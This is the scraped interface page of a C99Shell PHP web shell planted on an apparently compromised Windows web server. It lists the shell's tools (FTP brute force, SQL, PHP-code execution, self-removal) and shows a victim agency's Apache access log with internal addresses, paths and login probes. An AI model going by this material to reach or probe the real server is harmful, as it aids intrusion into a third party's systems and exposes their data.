!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.03.24.log (5.68 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [24/Mar/2023:00:00:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Mar/2023:23:58:31 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48250
192.168.175.240 - - [24/Mar/2023:00:00:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [23/Mar/2023:23:58:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44625
192.168.175.240 - - [24/Mar/2023:00:01:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:00:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:02:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:00:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [24/Mar/2023:00:03:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:04:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:04:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:05:03 -0500] "HEAD / HTTP/1.1" 200 -
201.244.27.189 - - [24/Mar/2023:00:05:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.244.27.189 - - [24/Mar/2023:00:05:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.244.27.189 - - [24/Mar/2023:00:05:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.240 - - [24/Mar/2023:00:05:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [24/Mar/2023:00:05:36 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:00:06:30 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [24/Mar/2023:00:07:17 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:00:07:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:05:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:00:06:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [24/Mar/2023:00:08:30 -0500] "GET / HTTP/1.1" 200 4720
35.163.78.206 - - [24/Mar/2023:00:08:39 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
192.168.175.240 - - [24/Mar/2023:00:09:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:09:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:10:03 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:10:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.156 - - [24/Mar/2023:00:10:45 -0500] "GET /forest/ HTTP/1.1" 200 12041
192.168.175.240 - - [24/Mar/2023:00:11:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:12:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:11:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:13:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:12:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
192.168.175.240 - - [24/Mar/2023:00:14:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:14:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:15:03 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:15:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:16:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:17:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:18:30 -0500] "GET / HTTP/1.1" 200 4720
51.161.117.63 - - [24/Mar/2023:00:19:17 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
172.22.2.4 - - [24/Mar/2023:00:17:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:19:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:19:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:20:03 -0500] "HEAD / HTTP/1.1" 200 -
138.197.24.249 - - [24/Mar/2023:00:20:04 -0500] "GET /aaa9 HTTP/1.1" 404 1018
138.197.24.249 - - [24/Mar/2023:00:20:05 -0500] "GET /aab8 HTTP/1.1" 404 1018
138.197.24.249 - - [24/Mar/2023:00:20:05 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Mar/2023:00:18:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
201.245.192.253 - - [24/Mar/2023:00:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42874
201.245.192.253 - - [24/Mar/2023:00:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43499
192.168.175.240 - - [24/Mar/2023:00:20:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:21:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:22:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:23:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [24/Mar/2023:00:24:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4345.pdf HTTP/1.1" 304 -
192.168.175.240 - - [24/Mar/2023:00:24:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:24:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:25:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:00:23:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:25:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:24:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
192.168.175.240 - - [24/Mar/2023:00:26:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:27:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:28:30 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.172 - - [24/Mar/2023:00:29:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4737.pdf HTTP/1.1" 304 -
192.168.175.240 - - [24/Mar/2023:00:29:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [24/Mar/2023:00:29:33 -0500] "-" 408 -
201.245.192.253 - - [24/Mar/2023:00:29:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
35.204.7.42 - - [24/Mar/2023:00:30:02 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [24/Mar/2023:00:30:02 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.156 - - [24/Mar/2023:00:30:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5247.pdf HTTP/1.1" 200 531567
201.245.192.253 - - [24/Mar/2023:00:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42874
201.245.192.253 - - [24/Mar/2023:00:30:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43499
192.168.175.240 - - [24/Mar/2023:00:30:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [24/Mar/2023:00:30:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10377
172.22.2.4 - - [24/Mar/2023:00:29:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [24/Mar/2023:00:31:14 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:00:31:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:30:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
173.252.79.16 - - [24/Mar/2023:00:32:28 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [24/Mar/2023:00:32:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [24/Mar/2023:00:32:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:33:30 -0500] "GET / HTTP/1.1" 200 4720
135.181.214.38 - - [24/Mar/2023:00:34:21 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
192.168.175.240 - - [24/Mar/2023:00:34:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:34:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
152.39.230.210 - - [24/Mar/2023:00:34:42 -0500] "GET /palmas-silvestres-secretaria-de-ambiente-inicia-campana-de-proteccion.html HTTP/1.1" 200 851
161.129.162.125 - - [24/Mar/2023:00:34:43 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
168.151.123.206 - - [24/Mar/2023:00:34:43 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
216.245.221.92 - - [24/Mar/2023:00:35:03 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:35:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [24/Mar/2023:00:35:36 -0500] "-" 408 -
35.204.251.204 - - [24/Mar/2023:00:36:19 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:00:36:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:35:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:37:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:35:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:00:38:30 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.216 - - [24/Mar/2023:00:38:53 -0500] "GET /images/humedal-principal-santa-maria-7-febrero.jpg HTTP/1.1" 200 86406
192.168.175.240 - - [24/Mar/2023:00:39:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:39:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:40:03 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:00:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42874
201.245.192.253 - - [24/Mar/2023:00:40:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43499
192.168.175.240 - - [24/Mar/2023:00:40:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:41:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:42:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:40:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.218 - - [24/Mar/2023:00:43:13 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
172.22.2.4 - - [24/Mar/2023:00:41:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
192.168.175.240 - - [24/Mar/2023:00:43:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:44:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:44:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
103.149.192.93 - - [24/Mar/2023:00:44:39 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [24/Mar/2023:00:45:03 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:45:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:46:30 -0500] "GET / HTTP/1.1" 200 4720
181.235.71.107 - - [24/Mar/2023:00:47:11 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
192.168.175.240 - - [24/Mar/2023:00:47:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:46:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:48:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:47:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:00:49:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:49:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:50:03 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:50:30 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [24/Mar/2023:00:51:15 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [24/Mar/2023:00:51:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [24/Mar/2023:00:51:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
66.249.70.184 - - [24/Mar/2023:00:51:18 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:00:51:30 -0500] "GET / HTTP/1.1" 200 4720
193.118.53.210 - - [24/Mar/2023:00:52:28 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
192.168.175.240 - - [24/Mar/2023:00:52:30 -0500] "GET / HTTP/1.1" 200 4720
191.66.57.230 - - [24/Mar/2023:00:53:17 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
52.167.144.156 - - [24/Mar/2023:00:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202017/4343.pdf HTTP/1.1" 200 256977
192.168.175.240 - - [24/Mar/2023:00:53:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:52:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:00:54:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:54:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:00:55:03 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:00:53:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [24/Mar/2023:00:55:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:56:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:57:30 -0500] "GET / HTTP/1.1" 200 4720
17.241.227.250 - - [24/Mar/2023:00:58:11 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:00:58:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:00:59:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:00:59:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:01:00:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:00:58:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.211 - - [24/Mar/2023:01:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/1720.pdf HTTP/1.1" 304 -
31.13.103.5 - - [24/Mar/2023:01:00:29 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
192.168.175.240 - - [24/Mar/2023:01:00:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:00:59:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
192.168.175.240 - - [24/Mar/2023:01:01:30 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.172 - - [24/Mar/2023:01:01:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/2383.pdf HTTP/1.1" 304 -
66.249.70.180 - - [24/Mar/2023:01:02:29 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:02:30 -0500] "GET / HTTP/1.1" 200 4720
190.84.108.224 - - [24/Mar/2023:01:03:00 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.84.108.224 - - [24/Mar/2023:01:03:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
192.168.175.240 - - [24/Mar/2023:01:03:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:04:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:04:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
17.241.227.12 - - [24/Mar/2023:01:04:59 -0500] "-" 408 -
216.245.221.92 - - [24/Mar/2023:01:05:02 -0500] "HEAD / HTTP/1.1" 200 -
34.147.67.40 - - [24/Mar/2023:01:05:29 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:01:05:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:04:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:06:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:05:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:01:07:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [24/Mar/2023:01:08:10 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:08:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:09:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:09:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
185.119.81.107 - - [24/Mar/2023:01:09:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [24/Mar/2023:01:09:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
35.236.215.231 - - [24/Mar/2023:01:09:47 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
35.236.215.231 - - [24/Mar/2023:01:09:47 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
216.245.221.92 - - [24/Mar/2023:01:10:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:10:30 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.225 - - [24/Mar/2023:01:10:35 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:11:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:10:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:12:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:11:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.167.144.167 - - [24/Mar/2023:01:12:43 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10377
52.167.144.167 - - [24/Mar/2023:01:12:44 -0500] "GET /autoliquidacion/index.php?dir=tr\xc3\x81mites+aguas+superficiales HTTP/1.1" 200 6871
192.168.175.240 - - [24/Mar/2023:01:13:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:14:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:14:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:01:15:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:15:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [24/Mar/2023:01:16:04 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:16:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:17:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:16:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:18:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:16:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
192.168.175.240 - - [24/Mar/2023:01:19:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:19:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
216.245.221.92 - - [24/Mar/2023:01:20:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:01:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42871
201.245.192.253 - - [24/Mar/2023:01:20:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43324
192.168.175.240 - - [24/Mar/2023:01:20:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:20:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
20.15.133.166 - - [24/Mar/2023:01:20:56 -0500] "-" 408 -
190.84.108.224 - - [24/Mar/2023:01:21:07 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
190.84.108.224 - - [24/Mar/2023:01:21:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
172.22.2.4 - - [24/Mar/2023:01:21:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
157.55.39.217 - - [24/Mar/2023:01:21:20 -0500] "GET /BLA/resoluciones/AUTOS%202017/1542.pdf HTTP/1.1" 200 283445
192.168.175.240 - - [24/Mar/2023:01:21:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:21:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:01:22:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:23:21 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
192.168.175.240 - - [24/Mar/2023:01:23:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:21:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.180 - - [24/Mar/2023:01:23:42 -0500] "-" 408 -
152.61.128.50 - - [24/Mar/2023:01:24:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [24/Mar/2023:01:24:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [24/Mar/2023:01:24:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [24/Mar/2023:01:22:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49744
192.168.175.240 - - [24/Mar/2023:01:24:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:23:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
216.245.221.92 - - [24/Mar/2023:01:25:02 -0500] "HEAD / HTTP/1.1" 200 -
34.147.68.14 - - [24/Mar/2023:01:25:14 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:01:25:30 -0500] "GET / HTTP/1.1" 200 4720
64.233.172.31 - - [24/Mar/2023:01:26:09 -0500] "GET /Publicaciones/SSFFS-11197-2021.zip HTTP/1.1" 404 232
192.168.175.240 - - [24/Mar/2023:01:26:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:26:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [24/Mar/2023:01:27:21 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
192.168.175.240 - - [24/Mar/2023:01:27:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:28:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:27:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48649
172.22.2.4 - - [24/Mar/2023:01:27:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:29:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:01:30:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:01:28:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
201.245.192.253 - - [24/Mar/2023:01:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42871
201.245.192.253 - - [24/Mar/2023:01:30:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43324
192.168.175.240 - - [24/Mar/2023:01:30:30 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.209 - - [24/Mar/2023:01:31:03 -0500] "GET /images/publicidad-exterior-visual-colash-22-noviembre.jpg HTTP/1.1" 200 44629
192.168.175.240 - - [24/Mar/2023:01:31:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:31:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
157.55.39.217 - - [24/Mar/2023:01:31:47 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
